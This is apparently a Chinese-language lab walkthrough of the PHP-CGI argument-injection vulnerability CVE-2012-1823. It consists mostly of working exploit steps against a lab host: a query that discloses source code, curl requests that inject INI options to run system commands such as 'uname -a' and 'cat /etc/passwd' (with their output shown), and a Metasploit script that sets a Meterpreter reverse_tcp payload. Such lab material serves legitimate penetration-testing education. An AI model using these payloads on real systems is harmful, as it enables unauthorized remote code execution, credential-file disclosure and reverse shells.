参考:
https://pentesterlab.com/exercises/cve-2012-1823/course
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
user@debian:~$ php-cgi -h
Usage: php [-q] [-h] [-s] [-v] [-i] [-f ]
php [args...]
-a Run interactively
-b | Bind Path for external FASTCGI Server mode
-C Do not chdir to the script's directory
-c | Look for php.ini file in this directory
-n No php.ini file will be used
-d foo[=bar] Define INI entry foo with value 'bar'
-e Generate extended information for debugger/profiler
-f Parse . Implies `-q'
-h This help
-i PHP information
-l Syntax check only (lint)
-m Show compiled in modules
-q Quiet-mode. Suppress HTTP Header output.
-s Display colour syntax highlighted source.
-v Version number
-w Display source with stripped comments and whitespace.
-z Load Zend extension .
-T Measure execution time of script repeated times.
于是我们试一下http://192.168.170.133/index.php?-s
或者http://192.168.170.133/?-s
即可查看到该文件index.php的源码。
将『
➜ ~ curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('uname -a');die(); ?>"
Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
➜ ~ curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('cat /etc/passwd');die(); ?>"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
利用metasploit
# php-cgi.msf
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.170.133
set RPORT 80
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.170.132
exploit